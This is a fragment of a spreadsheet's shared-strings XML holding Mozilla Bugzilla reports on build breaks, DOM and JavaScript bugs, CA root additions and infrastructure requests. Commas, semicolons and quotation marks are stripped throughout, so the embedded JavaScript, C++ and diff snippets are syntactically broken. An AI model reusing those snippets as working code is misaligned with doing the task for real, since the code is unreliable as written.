148 at Tinderbox3/Login.pm line 53.
Reproducible: Always
Steps to Reproduce:
1. browse to the tinderbox3 admin.pl cgi script
2. Click on the Login link
3. Enter any email/password values and click on the login button
Actual Results:  
DBD::Pg::db do failed: ERROR:  parser: parse error at or near ) at character
148 at Tinderbox3/Login.pm line 53.</t>
  </si>
  <si>
    <t>bear</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-502969</t>
  </si>
  <si>
    <t>Talos reboots (20090707 edition)</t>
  </si>
  <si>
    <t>Please reboot:
qm-plinux-fast04
qm-pxp-talos03
talos-rev2-xp02
talos-rev2-xp04</t>
  </si>
  <si>
    <t>CORE-305711</t>
  </si>
  <si>
    <t>Serializers</t>
  </si>
  <si>
    <t>nsIDocumentEncoder::OutputBodyOnly is broken</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b3) Gecko/20050719 SeaMonkey/1.0a
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b3) Gecko/20050719 SeaMonkey/1.0a
If I call nsIHTMLEditor::outputToString(text/html 0) then I get:
hello
If I call nsIHTMLEditor::outputToString(text/html
nsIDocumentEncoder::OutputBodyOnly) then I get:
hello
I expect to get:
hello
Reproducible: Couldn't Reproduce</t>
  </si>
  <si>
    <t>dom-to-text</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-22375</t>
  </si>
  <si>
    <t>Final critical bug test</t>
  </si>
  <si>
    <t>test 123</t>
  </si>
  <si>
    <t>CORE-240933</t>
  </si>
  <si>
    <t>Plaintext editor should stop using  all over</t>
  </si>
  <si>
    <t>The way the plaintext editor breaks up the text into line-length textnodes with
 nodes interspersed leads to some serious performance issues (see bug 237735).
Why do we do this instead of just keeping a single textnode (split up as needed
when editing happens and we have to create transactions for undo) and letting it
wrap due to layout wrapping it like it would any other chunk of text?  In more
detail
1) Would using such a single node be slower or faster in general on editor
   operations?
2) How much work would it be on the editor end to convert plaintext editor to
   such an approach?
3) What issues block doing so?  Can they be reproduced outside the context of
   editor?  Can we file them as bugs blocking this one?</t>
  </si>
  <si>
    <t>BUGZILLA-385283</t>
  </si>
  <si>
    <t>bz_webservice_demo.pl --product-name fails (Product.get_product no longer exists)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)
Build Identifier: 
bz_webservices_demo claims to call a webservice function get_product() with the name of the product. No such webservice call seems to exist so I've adapted it to use get_products() and product_id instead of product_name.
Reproducible: Always
Steps to Reproduce:
1. Use the client with --product_name Foo
2.
3.
Actual Results:  
Connecting to a Bugzilla of version 3.0.
Bugzilla's timezone is +0000.
Login successful.
Client Failed to locate method (get_product) in class (Bugzilla::WebService::Product) at /usr/lib/perl5/site_perl/5.8.0/SOAP/Lite.pm line 2586.
 in SOAP call near ./bz_webservice_demo.pl line 234.
Expected Results:  
It should have printed the info of the bug eg:
Connecting to a Bugzilla of version 3.0.
Login successful.
internals: HASH(0x8a55658)
name: Foo
id: 2
description: Foo Test Data</t>
  </si>
  <si>
    <t>tschoening</t>
  </si>
  <si>
    <t>SEAMONKEY-322246</t>
  </si>
  <si>
    <t>Missing accesskeys in the account wizard.</t>
  </si>
  <si>
    <t>The following items in the account wizard could use accesskeys:
    Account Wizard/
      New Account Setup (page 1)/
        Unix Mailspool (Movemail) optionbox.
      Server Information (page 3)/
        Use Global Inbox (store mail in Local Folders) chechbox.
      Congratulations (last page)/
        Finish-button (or is it activated by Return?)</t>
  </si>
  <si>
    <t>CORE-165609</t>
  </si>
  <si>
    <t>Child frames don't inherit parent's charset initially</t>
  </si>
  <si>
    <t>To demonstrate this bug go to Debug prefs &gt; Networking and disable Memory Cache
and Disk Cache.
A document contains two frames (either a FRAMESET'ed FRAME or an IFRAME).
1. One frame's SRC is a regular URL. The URL loads. The loaded frame's charset
is the same as the parent's charset.
2. Other frame's SRC is a javascript: URL simply to fill the frame initially
with some content. Those contents are immediately replaced with some other
contents. The second frame's charset is default ISO-8859-1.
You can check the frame's charset by right-clicking on the frame -&gt; This Frame
-&gt; Frame Info.
The other contents of the second frame is a Hebrew word. This is made to
demonstrate that this Hebrew word might be rendered differently when writeln'd
in ISO-8859-1 vs. ISO-8859-8. This is the only case when this bug shows visible
malfunctions on sites.
Shift-Reloading the frame parent will set the second frame's charset to the
parent's encoding.
Reloading (without Shift) the frame parent will set the second frame's charset
to ISO-8859-1 again.</t>
  </si>
  <si>
    <t>ilya.konstantinov+future</t>
  </si>
  <si>
    <t>SEAMONKEY-387279</t>
  </si>
  <si>
    <t>move searchplugins to locale</t>
  </si>
  <si>
    <t>We should move the searchplugins we currently have in xpfe/components/search/datasets to suite/locales so localizers can include their own possibly modified list.</t>
  </si>
  <si>
    <t>FIREFOX-274474</t>
  </si>
  <si>
    <t>Firefox will not open with SP2 installed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Cannot open Firefox after downloading it. Removed and re-downloaded three times
and tried to open different ways (icon Windows Explorer Programs) but did not
open. I get the hourglass momentarily but it won't open.
I removed SP2 and Firefox opened/worked fine. Contacted Microsoft about SP2 and
they said to contact you.
This appears to be similar to Bug 273098 but when I went to link:
(https://bugzilla.mozilla.org/show_bug.cgi?id=225894#c32) with possible fix it
referred to Monzilla and Shockwave. But according to Microsoft their impression
is a conflict which seems to me to be more basic than some unique fix on my
computer. This seems to me to be a fundamental problem warranting a fix in your
program? (Besides to be honest such a fix - which is only a 'try this?' may be
beyond my computer skills as it seemed complicated and I am afraid may mess up
my computer with no assurances it will work.) 
Is there a (simpler) fix known to work you can provide me with or is there a
fundamental fix in the program that you need to do?
Thanks.
Dennis Wilder
Reproducible: Always
Steps to Reproduce:
1.Instsll SP2
2.Instsll Firefox
3.Try to open Firefox
Actual Results:  
Would not open.
Expected Results:  
Firefox should open.</t>
  </si>
  <si>
    <t>dgwilder1</t>
  </si>
  <si>
    <t>THUNDERBIRD-291011</t>
  </si>
  <si>
    <t>Broken Version Information in About Dialog and in mail User agent</t>
  </si>
  <si>
    <t>Fall out from Bug #274928
Fix coming up to make the version string show back up again.</t>
  </si>
  <si>
    <t>FIREFOX-350677</t>
  </si>
  <si>
    <t>[Mac] No hover state for New Bookmark button in bookmarks manager</t>
  </si>
  <si>
    <t>Hovering the new bookmark toolbar button in the bookmarks manager fails to show a hover state because as the console says
Warning: Error in parsing value for property '-moz-image-region'.  Declaration dropped.
Source File: chrome://browser/skin/bookmarks/bookmarksManager.css
Line: 10</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-164664</t>
  </si>
  <si>
    <t>JS console evaluation ignores leading whitespace</t>
  </si>
  <si>
    <t>Steps to reproduce problem:
1. In the JS console evaluate  Test 
2. Right-click the result line and select Copy
3. Paste it into a text field
Actual results: Test  gets pasted
Expected results:  Test  gets pasted</t>
  </si>
  <si>
    <t>TESTOPIA-434088</t>
  </si>
  <si>
    <t>In nth Run of Test Case Update Status of Case in Run Tab refreshes screen with all previous runs of that case</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Build Identifier: /bugzilla-3.0.3/
1) Created test plan with lots of cases no problem.
2) Ran Test Plan 1x no problem.
3) Ran same Test Plan Second time by going to plan creating new run selecting all cases.  Created new run no problem.  All and only cases relevant to this run appear in center scrolling window.
4) NOW select a case update status to PASSED OR FAILED OR RUNNING or anything pretty much.  Scrolling window updates status of that case but also displays back from the dead all previous runs of that particular case.  Need to hit filter again to get rid of them.  In one test plan we had this happened consistently for every single test case.  I just tested another second run of a test plan and observed that for some cases old case run loaded for others not.  Filters in general for this tab a big buggy.  Filter will not save with RUNNING selected as a status and if several statuses are selected seems to throw one or some away upon save.  I only mention because these problems might be related may be a bug in the part of the software that filters that runs?
Apologies in advance if this is a known bug and there's a patch I looked through the bugs and did not see anything similar tho it seems hard to believe noone has encountered.  Rest of the app works great and we are very very happy.
Reproducible: Sometimes
Steps to Reproduce:
1.Create Plan with cases
2. Run plan one time = Run1
3.  Run plan second time = Run2
4.  On second run update status of test case
5.  Observe refreshed scrolling case window screen case run from Run1 appears at top of scrolling list.
6.  if you do not observe 5. in first case you update keep going.  In one instance did not happen until the 5th case in the plan.
Actual Results:  
Scrolling window shows updated status of case you just adjusted plus an entry for each previous run of the updated case Run1
Expected Results:  
Scrolling window should show updated status of case adjusted just for the current run = Run2</t>
  </si>
  <si>
    <t>lisa.dickinson</t>
  </si>
  <si>
    <t>SEAMONKEY-383936</t>
  </si>
  <si>
    <t>Continue synchronisation of xpfe autocomplete with toolkit autocomplete</t>
  </si>
  <si>
    <t>Created attachment 267876
support for  children
I'm porting a Firefox extension to SeaMonkey which uses this construct:
This works fine in Firefox but makes SeaMonkey's autocomplete.xml unhappy and non functional. This patch adds the toolkit versions support for hbox and tidies up the anonids in the locality somewhat.</t>
  </si>
  <si>
    <t>philip.chee</t>
  </si>
  <si>
    <t>NSS-425469</t>
  </si>
  <si>
    <t>Add multiple new roots: Geotrust Thawte Verisign Trustwave Comodo</t>
  </si>
  <si>
    <t>This bug is meant to land a single patch that adds multiple new roots.</t>
  </si>
  <si>
    <t>NSS-483889</t>
  </si>
  <si>
    <t>CA Certificates Code</t>
  </si>
  <si>
    <t>Add Certigna root certificate to NSS</t>
  </si>
  <si>
    <t>This bug requests inclusion in the NSS root certificate store of the following
certificate owned by Certigna of Dhimyotis.
Friendly name: 
Certigna
Certificate location:
http://www.certigna.fr/ca/ACcertigna.crt
SHA1 Fingerprint:
B1:2E:13:63:45:86:A4:6F:1A:B2:60:68:37:58:2D:C4:AC:FD:94:97
Trust flags: Websites Email
Test URL: 
https://www.certigna.fr
This CA has been assessed in accordance with the Mozilla project guidelines
and the certificate approved for inclusion in bug 393166.
The next steps are as follows:
1) A representative of the CA must confirm that all the data in this bug is
correct and that the correct certificate(s) have been attached. They must also
specify what OS they would like to use to perform the verification below.
2) A Mozilla representative creates a test build of NSS with the new
certificate(s) and attaches nssckbi.dll to this bug. A representative of the
CA must download this drop it into a copy of Firefox and/or Thunderbird on the
OS in question and confirm (by adding a comment here) that the certificate(s)
have been correctly imported and that websites work correctly.
3) The Mozilla representative checks the certificate(s) into the NSS store and
marks the bug RESOLVED FIXED.
4) At some time after that various Mozilla products will move to using a
version of NSS which contains the certificate. This process is mostly under the
control of the release drivers for those products.</t>
  </si>
  <si>
    <t>CORE-38378</t>
  </si>
  <si>
    <t>Style system should not reresolve for every attribute change</t>
  </si>
  <si>
    <t>First some background as provided to me by the ever-helpful attinasi:
CSSFrameConstructor::AttributeChanged is called. This is were the
restyling happens. First the content object is asked what the impact of
the change is (given an attribute and a value). It can indicate a
RECONSTRUCTION a REFRAME or a simple VISUAL change.
For RECONSTRUCT the entire document is torn down and rebuilt. Pretty
harsh.
For a REFRAME a new frame is created for the affected content and
normal frame-construction / style resolution takes place.
For a VISUAL change we ask the FrameManager to compute the style change
impact. This walks up the frames getting the style contexts from them
and re-resolves the style on each one. ReResolve style runs through all
of the style rules for the content and any pseudo-style associated with
it and sets the new style values. As it goes it checks if the style
context actually changes and if it does it appends the new context to a
list of changes. It also keeps track of the kinds of changes that are
made indicating if there needs to be a reflow a reframe or just a
repaint. Depending on the results of the resolutions we then either
reconstruct the frames issue a reflow or update (paint) the views.
(End of attinasi missive.)
So this means that the _best_ case scenario for an attribute change is that we
walk every frame in the document and reresolve the style on each one.  Then we
decide what to do with it and in the best case again we do nothing (or issue a
paint I guess).
As an example of why I really want to fix this behaviour scrolling a GFX
scrollbar sets the ``curpos'' attribute lots.  Like lots and lots.
So I hacked up a patch which I will attach below.  It keeps a list on each
style sheet of each attribute that actually appears in a selector and then
checks against that table when an attribute changes.  Only if that attribute can
affect style context do we do the re-resolve dance.
With this patch I spit out a - for each style reresolution that I manage to
skip and a + for each one that has to happen anyway (no attribute involved in
the reresolution or attribute that mattered).  I scrolled the checkin-rules
page down and then back up and got the following:
------------++++++++++--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------++++++----------------------------------------------------------------------------------------------------------++++----------------------------------------------------------------------------++-
So damn.  It looks like we can win pretty huge here.
But of course it's not quite that easy.  I'm apparently causing not _quite_
enough action in the layout engine at times because some needed updates aren't
happening.  As an example while the document scrolls the scroll thumb doesn't
move.  And image rollovers as found on my old nemesis http://www.honda.com/ 
don't work.
Maybe I need to fire a paint at the minimum.  Maybe I'm blocking reresolutions
too aggressively and need to be more careful that I only block the ones that
are directly from the AttributeChanged notification and not from other paths
through that code.  I'm not sure yet but I wanted to throw this out for people
to poke at while I ponder.
(I think the patch will build but some files did get touched lightly when I
updated before the diff and there are some other -- unrelated I think --
changes in my layout tree.  No warranty express or implied.)</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-511563</t>
  </si>
  <si>
    <t>Add Firefox 3.6a1 3.6a2pre and 3.7a1pre to crash-stats.m.c</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #448527 +++
Need to add Firefox 3.6a1 3.6a2pre and 3.7a12pre to crash-stats.m.c so people can search for crashes occurring in these versions.
Maybe this should be added to some checklist for when a new branch is created and a version number is bumped because this always seems to be forgotten.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-369449</t>
  </si>
  <si>
    <t>quickparse should show binaryurl</t>
  </si>
  <si>
    <t>The quickparse page should show the contents of binaryurl in one of the columns e.g.:
Build|Firefox|Linux argo-vm Depend Nightly|success|1170741360|http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2007-02-05-04-trunk/
This would make it much easier to track builds for testing purposes.</t>
  </si>
  <si>
    <t>CORE-283531</t>
  </si>
  <si>
    <t>nsIEventStateManager::DispatchNewEvent() has confusing argument names</t>
  </si>
  <si>
    <t>The current nsIEventStateManager::DispatchNewEvent() signature looks like this:
  NS_IMETHOD DispatchNewEvent(nsISupports* aTarget nsIDOMEvent* aEvent
                              PRBool * aPreventDefault)
the confusing part of that is the last argument aPreventDefault. What we do
with that argument and IMO what we do is correct per the specs etc is to tell
whether or not the default action is enabled but the name suggests that it
means the exact opposite of that. This has lead to confusing code all throughout
our codebase code that looks like this:
  PRBool noDefault
  esm-&gt;DispatchNewEvent(target event 
and that leads anyone who reads that code to believe that if noDefault is true
then the default action was prevented. But again the exact opposite is what it
really means.
I'm proposing to change the signature to:
  NS_IMETHOD DispatchNewEvent(nsISupports* aTarget nsIDOMEvent* aEvent
                              PRBool * aDefaultActionEnabled)
and to change code like the above to use a variable named defaultActionEnabled
to make it clear what we're really dealing with here. Patch coming up.</t>
  </si>
  <si>
    <t>NSPR-70116</t>
  </si>
  <si>
    <t>nsprpub does not build</t>
  </si>
  <si>
    <t>with latest configure/autoconf changes rolled in  nspr no longer builds on win9x
nsprpub/config/Makefile.in trys to build the nsprpub version of nsinstall
( which is *ix only code)
fix:[daa@daa config]$ cvs diff Makefile.in
Index: Makefile.in
===================================================================
RCS file: /cvsroot/mozilla/nsprpub/config/Makefile.inv
retrieving revision 1.2.28.3
diff -r1.2.28.3 Makefile.in
97c97
&lt; ifeq ($(filter-out OS2 WINNT$(OS_ARCH)))
---
&gt; ifeq ($(filter-out OS2 WINNT WIN95$(OS_ARCH)))</t>
  </si>
  <si>
    <t>daa</t>
  </si>
  <si>
    <t>CORE-483539</t>
  </si>
  <si>
    <t>OS/2 build break in jsnum.cpp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9.2a1pre) Gecko/20090312 Minefield/3.2a1pre
Build Identifier: 
The define for FIX_FPU in jsnum.cpp was changed by the checkin for bug480144 from _control87(MCW_EM | PC_53 MCW_EM | MCW_PC)
to _control87(_MCW_EM | _PC_53 _MCW_EM | _MCW_PC). Now the OS/2 build breaks because float.h of OS/2 defines MCW_EM PC_53 and MCW_PC
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-129786</t>
  </si>
  <si>
    <t>[XBLFC] 'Classic' XBL buttons do not show an :active style (win2k/Classic)</t>
  </si>
  <si>
    <t>On win2k (at least) using the Classic skin when a button is clicked is does
not show as depressed. i.e. they do not have a depressed style for :active
In the modern skin buttons do show a depressed (:active) state when
mousedown.
To test: pick any page with an html button (either  or 
). Do a mousedown on the button in Classic skin. Button will
not depress.
[Comments based on testing with 2002030710 trunk build classic skin win2k
XBL Form Controls enabled unless otherwise noted. madhur: could you test this
on the full matrix (Classic|Modern) X (win32|MacOS9|MacOSX|Linux) and update
this bug with the status on those platform/skin combinations.  Thanks.]</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-410026</t>
  </si>
  <si>
    <t>AMO SJ logs not compressing?</t>
  </si>
  <si>
    <t>I noticed in the cron mail tonight that none of the 12/27 SJ access logs parsed like usual but NL worked fine.
I looked on the netapp and it seems that the logs since yesterday at 11am are not being compressed which causes them to not be parsed by our counters.</t>
  </si>
  <si>
    <t>CORE-160334</t>
  </si>
  <si>
    <t>EVENT_STATE_CHANGE with STATE_BUSY flag cleared is fired too early for new page loads</t>
  </si>
  <si>
    <t>We are notifying assistive technology that a page is finished loaded when it is
first displayed instead of when the text of the page is completely loaded.
We should wait to fire the event until the page is completely loaded otherwise
assistive tech has difficulty loading the page contents into its own buffer.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-430863</t>
  </si>
  <si>
    <t>Treehydra: commit extra JS libs and analysis frameworks</t>
  </si>
  <si>
    <t>Created attachment 317771
Code written for outparams
This bug is to add the potentially reusable code from the outparams analysis to the Treehydra distribution as libraries. Here's the code please review.</t>
  </si>
  <si>
    <t>THUNDERBIRD-391005</t>
  </si>
  <si>
    <t>Headers are not being displayed properly in header pane</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007080505 Minefield/3.0a8pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007080505 Thunderbird/3.0a1pre ID:2007080505
Starting with today's trunk build:
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007080505 Thunderbird/3.0a1pre ID:2007080505
Thunderbird does not display any longer the values for most of the header fields. Instead e.g. 'Content-Type' it just says 'unknown'.
This can also be seen with today's Seamonkey trunk build.
Reproducible: Always
Steps to Reproduce:
1. Open a newsgroup posting or a mail
2. Observe header pane
3.
Actual Results:  
Most header fields are called 'unknown' the values itself are displayed properly.
Expected Results:  
Header fields should display name of the header e.g. 'Content-Type'.</t>
  </si>
  <si>
    <t>markushossner</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-346013</t>
  </si>
  <si>
    <t>Improve release testing scripts</t>
  </si>
  <si>
    <t>Automated release scripts for checking update should be added to mozilla/testing.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-184716</t>
  </si>
  <si>
    <t>oeefcuhb.com - The web site required Netscape 4.79 or IE6 Mozilla will not open up the page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
https://www.oeefcuhb.com/index.html
https://global1.onlinebank.com/cgi-forte/forteisapi.dll?ServiceName=WebTeller&amp;TemplateName=BrowserUpgrade.htm&amp;BankTag=546hawaii
 In order to provide you with the highest level of service and security this
service requires you to have one of the browser versions currently supported.
Browser versions currently supported:
Windows
    * Netscape Communicator 4.7
    * Netscape Communicator 4.78
    * Netscape Communicator 4.79
    * Microsoft Internet Explorer 5.0
    * Microsoft Internet Explorer 5.5
    * Microsoft Internet Explorer 6
(Note: This service supports AOL 5.0 as an Internet Service Provider only with
the use of one of the Windows browsers listed above.)
Reproducible: Always
Steps to Reproduce:
1.  Go to web site  https://www.oeefcuhb.com/index.html
2.  Clicked on:   Bill Payment-Direct Pay 
3.  The page will be unable to be processed or viewed.
Actual Results:  
the following message comes up:  
https://global1.onlinebank.com/cgi-forte/forteisapi.dll?ServiceName=WebTeller&amp;TemplateName=BrowserUpgrade.htm&amp;BankTag=546hawaii
 In order to provide you with the highest level of service and security this
service requires you to have one of the browser versions currently supported.
Browser versions currently supported:
Windows
    * Netscape Communicator 4.7
    * Netscape Communicator 4.78
    * Netscape Communicator 4.79
    * Microsoft Internet Explorer 5.0
    * Microsoft Internet Explorer 5.5
    * Microsoft Internet Explorer 6
(Note: This service supports AOL 5.0 as an Internet Service Provider only with
the use of one of the Windows browsers listed above.)
Expected Results:  
should be able to get the page to do direct pay from my bank...</t>
  </si>
  <si>
    <t>mirandar</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-511629</t>
  </si>
  <si>
    <t>Superfluous hbox in tabs.xml</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1) Gecko/20090624 Firefox/3.5
Build Identifier: fennec 1.0b3
The close button is wrapped in a hbox which is unneeded since we can position the button directly
Reproducible: Always</t>
  </si>
  <si>
    <t>fabrice.desre</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-460192</t>
  </si>
  <si>
    <t>Create drupal-views package</t>
  </si>
  <si>
    <t>http://drupal.org/project/views  6.x-2.0-rc5 (highest rc until we get an official release)</t>
  </si>
  <si>
    <t>CORE-296230</t>
  </si>
  <si>
    <t>javascript removeNode only affects the view NOT the DOM</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050601 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050601 Firefox/1.0+
I'm using javascript to populate an html table using the DOM functions
createElement appendChild etc. But there is a problem when I try to remove the
rows:
  I first loop in the childNodes of the tbody and remove some of the rows. The
result is immediately visible in the page.
  Then I reloop in the childNodes of the tbody to remove some other rows.
Surprisingly the rows I removed first are still there (from a javascript point
of view) and if I try to remove one of those ghosts I get the following error:
Error: uncaught exception: [Exception... Node was not found  code: 8
nsresult: 0x80530008 (NS_ERROR_DOM_NOT_FOUND_ERR)  location:
http://localhost/functions.js Line: 58]
If I go to the DOMInspector the rows don't appear in the DOM tree but are
still shown in the childNodes of the tbody in the Javascript Object view.
Here is the tree :
table
  tbody
    tr
      td
        input type=checkbox (checked: the row is to be removed)
      td
        text and image
    tr (same as above)
    tr (same as above)
    tr (same as above)
Reproducible: Always
Steps to Reproduce:
1. create a new file and paste this code:
function removeFromList(tBody){
  n_tbody = document.getElementById(tBody)
  n_trs = n_tbody.childNodes
  n_toRemove = Array()
  for(i_tr in n_trs){
    /* skip the non-tr nodes */
    if(n_trs[i_tr].nodeName==undefined ||
       n_trs[i_tr].nodeName.toLowerCase()!=tr) continue
    /* get the checkbox directly (quick and dirty without checks) */
    n_input = n_trs[i_tr].firstChild.firstChild
    if(n_input.checked==true){
      n_toRemove.push(n_trs[i_tr])
    }
  }
  /* remove the nodes */
  while(n_tr = n_toRemove.pop()) n_tbody.removeChild(n_tr) /* &lt;-- error here */
}
cell1
cell 1
cell 2
cell 3
cell 4
2. Open the page with firefox select AT LEAST TWO checkboxes and click remove
3. Select another checkbox and click remove
Actual Results:  
The first time the rows are removed
The second time I get a javascript error
--&gt; the DOM view shows 3 lines the Javascript object shows 4!
BUT: when only one checkbox is selected at a time everything goes well.
Expected Results:  
The rows should be removed the Javascript object and dom tree sould be synchronized</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-454956</t>
  </si>
  <si>
    <t>OS/2 build broken with GCC 3.4.6 or later</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.8.1.16) Gecko/20080715 PmWFx/2.0.0.16
Build Identifier: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.8.1.16) Gecko/20080715 PmWFx/2.0.0.16
Building current OS/2 cvs fails with GCC 3.4.6 
error:
../../../dist/include/widget/nsIDragSessionOS2.h:99: error: extra `'
Line 62 of the above file has a semi-colon at the end of the #define which is unnecessary.
Additionally line 853 of widget\src\os2\nsRwsService.cpp also has an unnecessary  which causes build breakage with GCC 3.4.6
Reproducible: Always
Steps to Reproduce:
1. Compile using GCC 3.4.6 - available from http://downloads.smedley.info/gcc-3.4.6-os2-20080912.zip - updated setmozenv available from http://smedley.info/setmozenv_gcc346.cmd
Actual Results:  
Build breakage with errors mentioned in details
Expected Results:  
The build to work :)</t>
  </si>
  <si>
    <t>CORE-302462</t>
  </si>
  <si>
    <t>Support :valid :invalid :out-of-range and :in-range pseudoclasses</t>
  </si>
  <si>
    <t>In bug 271720 there was an agreement on:
So should we just have valid/in-range always be true and invalid/out-of-range
false for HTML elements?  And leave an XXX: for whoever implements Web Forms in
the future?
(https://bugzilla.mozilla.org/show_bug.cgi?id=271720#c75)</t>
  </si>
  <si>
    <t>CORE-370588</t>
  </si>
  <si>
    <t>Rework gfxTextRun part 2</t>
  </si>
  <si>
    <t>The following patch does two major things: hoist the platform-independent code from gfxPangoTextRun to gfxTextRun (removing gfxPangoTextRun in the process) and implement gfxTextRun properly for Mac and Windows. These have to be done at the same time.</t>
  </si>
  <si>
    <t>CORE-929467</t>
  </si>
  <si>
    <t>Only make Proxy a constructor when target is a constructor</t>
  </si>
  <si>
    <t>test case:
new (new Proxy(Object.create {construct: () =&gt; {print(no!!!) return {}} }))
Expected: 
TypeError is thrown because `Object.create` is not a constructor
Actual:
construct trap is called on proxy
See 9.3.16 [[Construct]] for Proxy Objects NOTE 1:
https://people.mozilla.org/~jorendorff/es6-draft.html#sec-construct-internal-method</t>
  </si>
  <si>
    <t>efaustbmo</t>
  </si>
  <si>
    <t>andrebargull</t>
  </si>
  <si>
    <t>BUGZILLA-13534</t>
  </si>
  <si>
    <t>REMIND and LATER considered harmful.</t>
  </si>
  <si>
    <t>I think that we should endeavour to remove REMIND and LATER from Bugzilla.  I
believe that they achieve more harm than good.
There are many disadvantages:
(a) They can easily not appear as queries.  After all they are _unresolved_.
(b) Effort to reopen resulting in comments/activity which clutter the bug
report.
(c) They are usually set by Netscape employees and hence imply Netscape's agenda
for what will go in.  Mozilla at least is a open project where anyone can
contribute.
So what's the alternative?  The obvious answer is the milestone.
Remind can already be handled by moving the bugs to a later milestone where
they need to get reevaluated.  Remind could even get turned into a bug flag
(see bug #11155).
For LATER there needs to be an No Target milestone.  This means that there is
currently no plan for implementation but it has been considered and hence
won't appear on groups' new bugs radar (ie having a blank milestone which might
be renamed to To Be Considered).
This would require a little modification of queries by Netscape employees to
exclude untargetted bug reports but they generally know how to use Bugzilla.
It is a lot more important that Bugzilla newbies can quickly find the issues
that do not have a target date and they should help out on and point (a) can
prevent this.  This combined with the introduction of assigning to
nobody@mozilla.org covers all the issues that I know of.
Note that this works just as well for closed or in-house projects that use
Bugzilla.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-239345</t>
  </si>
  <si>
    <t>Installation Instructions for Mozilla 1.7 Beta - mistake in MacOS uninstall section</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O ja-JP rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: 
&gt; 1. Remove the folder Mozilla from /Users/yourusername/Library
&gt; 2. Remove the application files in /Users//Library/Mozilla  (but
leave the Profiles sub-folder).
The same steps are repeated. Just remove first line :-)
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>endico</t>
  </si>
  <si>
    <t>u115577</t>
  </si>
  <si>
    <t>SEAMONKEY-64396</t>
  </si>
  <si>
    <t>biff arrow doesn't pop up in new nav window</t>
  </si>
  <si>
    <t>Build 2001010420 Win32.
If you have new mail while in navigator (arrow pops up in task bar) and open a
new navigator window (ctrl-n) this new window does *not* show the green arrow
in the taskbar. Imho while this green arrow should be for global biff it
should appear in every window also new ones.</t>
  </si>
  <si>
    <t>schut</t>
  </si>
  <si>
    <t>CALENDAR-362645</t>
  </si>
  <si>
    <t>Google Calendar Provider: Support for Optimistic Concurrency</t>
  </si>
  <si>
    <t>Google implements Optimistic concurrency. See URL for details. This needs to be considered for the Google Calendar provider.
In short if the event has been changed remotely and the client wants to update an older version a 409 Conflict HTTP response is returned from google. The event details need to be updated and potential conflicts need to be resolved before sending the event again with the new edit URI.
Trivial changes can be merged between events but remote changes that concern fields that were changed locally need to be blessed by the user. This goes into event syncronization and could potentially use the same code. It just need to be written first.</t>
  </si>
  <si>
    <t>CORE-339066</t>
  </si>
  <si>
    <t>Spell checker marks word as partially wrong</t>
  </si>
  <si>
    <t>Sometimes the spell checker underlines a word partially.
Can't find a way to reproduce it consistently however. I saw this twice until now.
A possible explanation could be that it sometimes thinks that the word is two words (loading = load and ing) and in that case it could be a cairo problem.</t>
  </si>
  <si>
    <t>ria.klaassen</t>
  </si>
  <si>
    <t>THUNDERBIRD-271353</t>
  </si>
  <si>
    <t>An access key is displayed on the dialog button of a Compose window.</t>
  </si>
  <si>
    <t>When localizing an access key is added to the button of the dialog displayed
when closing a Compose window.
Reproducible:always
Steps to Reproduce:
1. A language package is installed.
  ex)
